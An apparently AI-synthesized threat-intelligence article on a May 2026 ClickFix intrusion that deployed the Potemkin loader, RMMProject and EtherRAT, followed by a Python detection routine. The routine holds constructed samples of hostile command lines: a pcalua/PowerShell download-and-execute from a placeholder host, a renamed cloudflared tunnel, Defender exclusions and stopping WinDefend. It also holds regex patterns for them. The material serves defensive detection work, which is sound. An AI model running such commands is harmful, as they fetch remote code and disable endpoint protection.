VYPR · breach · Published Jun 17, 2026 · 1 source

ClickFix Campaign Deploys Potemkin Loader and EtherRAT in Multi-Stage Hands-On-Keyboard Attack

A ClickFix social-engineering campaign in May 2026 led to a full hands-on-keyboard intrusion, with attackers deploying the Potemkin loader and EtherRAT backdoor across 11+ hosts.

A single deceptive prompt was all it took for attackers to gain a foothold inside an organization, spread to over 11 systems, and deploy two separate remote access tools before anyone noticed. A new campaign using the ClickFix technique has shown how far one unguarded moment can go. Researchers at Huntress identified this ClickFix attack in May 2026, tracing it from a single unmonitored endpoint through a full hands-on-keyboard intrusion across the victim's network.

The infection began when a user visited a compromised website and ran a command that used pcalua.exe, a legitimate Windows utility, to silently fetch and run a remote script. That script downloaded and installed an MSI package in the background with no visible indication to the user. The MSI dropped a custom loader named Potemkin, which connected to a command-and-control server and loaded a fully featured remote access tool called RMMProject entirely in memory. Separately, the attacker deployed EtherRAT, a Node.js backdoor that retrieves its server address from the Ethereum blockchain, making it hard to disrupt through traditional domain takedowns.

Potemkin is a lean, purpose-built loader with a Domain Generation Algorithm that produces 10,000 candidate domains from a built-in word list and probes each one until it finds a live server. Once connected, its only job is to fetch and reflectively load RMMProject, a 4.4 MB DLL with 15 task types covering browser credential theft, cookie stealing across Chrome, Firefox, and Edge, a hidden remote desktop module, and process injection. Five hours later, the attacker dropped EtherRAT and set up a Cloudflare tunnel using a renamed copy of cloudflared, securing persistent internet-reachable access inside the network.

Once inside, a human operator took direct control and began working through the network manually. They used compromised Administrator credentials, ran reconnaissance consistent with the Impacket toolkit, and moved laterally to the domain controller via WMIExec and SMBExec. The goal was to spread EtherRAT across as many hosts as possible while establishing multiple fallback paths. The attacker worked hard to silence Windows Defender throughout the session, cycling through AMSI patches, registry policy writes, reflective in-memory loading, and exclusion path abuse before stopping the Defender service outright.

A reverse shell on port 43301 and multiple Chisel SOCKS tunnels gave the attackers layered persistence that could survive individual detections. Huntress recommended that organizations immediately audit endpoint coverage, since the whole intrusion started on a machine with no monitoring agent. Disabling the Windows Run dialog through Group Policy removes the ClickFix entry point, as the attack depends on the user pasting a command into that dialog. Teams should alert on cloudflared or renamed copies on endpoints, and treat Stop-Service WinDefend alongside bulk Add-MpPreference exclusion commands as high-confidence threat signals.
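A small triage routine over constructed process-creation records, added here as an illustration of those signals (it is not code from Huntress or from the campaign): it flags pcalua.exe launching with a remote URL, cloudflared by its PE OriginalFileName even when the file has been renamed, Stop-Service WinDefend, and three or more Add-MpPreference exclusions on one host within ten minutes. Hostnames, paths, timestamps, the token placeholder and the thresholds are assumptions for the example.

```python
import re
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
def ev(ts, host, orig, image, cmd):
    return {"ts": datetime.fromisoformat(ts), "host": host, "orig": orig, "image": image, "cmd": cmd}

# Constructed samples in the shape of Sysmon Event ID 1; hosts, paths, token and times are invented.
SAMPLE_EVENTS = [
    ev("2026-05-12T09:01:10", "WS-07", "pcalua.exe", r"C:\Windows\System32\pcalua.exe",
       'pcalua.exe -a powershell -c "iwr https://example.invalid/s.ps1 | iex"'),
    ev("2026-05-12T14:02:31", "WS-07", "cloudflared.exe", r"C:\ProgramData\svc\update.exe",
       "update.exe tunnel run --token PLACEHOLDER"),
    ev("2026-05-12T14:10:02", "WS-07", "PowerShell.EXE", PS, "Add-MpPreference -ExclusionPath C:\\ProgramData\\svc"),
    ev("2026-05-12T14:10:05", "WS-07", "PowerShell.EXE", PS, "Add-MpPreference -ExclusionPath C:\\Users\\Public"),
    ev("2026-05-12T14:10:07", "WS-07", "PowerShell.EXE", PS, "Add-MpPreference -ExclusionProcess node.exe"),
    ev("2026-05-12T14:12:40", "DC-01", "PowerShell.EXE", PS, "Stop-Service -Name WinDefend -Force"),
    ev("2026-05-12T15:00:00", "WS-02", "PowerShell.EXE", PS, "Add-MpPreference -ExclusionPath D:\\Builds"),
]

STOP_DEFENDER = re.compile(r"stop-service\b.*\bwindefend\b", re.I)
MP_EXCLUSION = re.compile(r"add-mppreference\b.*-exclusion(path|process|extension)", re.I)

def event_signals(e):
    """Signals that are high confidence on a single event."""
    name, hits = PureWindowsPath(e["image"]).name.lower(), []
    if name == "pcalua.exe" and re.search(r"https?://", e["cmd"], re.I):
        hits.append("clickfix_pcalua_remote_fetch")
    if e["orig"].lower() == "cloudflared.exe":  # OriginalFileName survives renaming the binary on disk
        hits.append("cloudflared" if name == "cloudflared.exe" else "cloudflared_renamed")
    if STOP_DEFENDER.search(e["cmd"]):
        hits.append("defender_service_stopped")
    return hits

def bulk_exclusion_hosts(events, threshold=3, window=timedelta(minutes=10)):
    """Hosts with at least `threshold` Add-MpPreference exclusions inside one time window."""
    times = {}
    for e in sorted(events, key=lambda x: x["ts"]):
        if MP_EXCLUSION.search(e["cmd"]):
            times.setdefault(e["host"], []).append(e["ts"])
    return {h for h, t in times.items()
            if any(t[i + threshold - 1] - t[i] <= window for i in range(len(t) - threshold + 1))}

def scan(events):
    """Map host -> set of signal names; a single exclusion on WS-02 stays below the bulk threshold."""
    report = {}
    for e in events:
        for s in event_signals(e):
            report.setdefault(e["host"], set()).add(s)
    for h in bulk_exclusion_hosts(events):
        report.setdefault(h, set()).add("bulk_defender_exclusions")
    return report
```

In a real deployment the same logic would read Sysmon or EDR telemetry rather than the embedded list, and the bulk threshold should be tuned against the environment's normal Defender administration.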

The ClickFix technique continues to evolve as a favored social-engineering vector, often paired with legitimate system utilities to bypass traditional defenses. This campaign demonstrates the increasing sophistication of initial access brokers who combine fake troubleshooting prompts with custom loaders and blockchain-anchored C2 infrastructure. Organizations should treat any unsolicited instruction to run commands from a web page as a high-risk event and ensure all endpoints have active monitoring agents deployed.

Synthesized by Vypr AI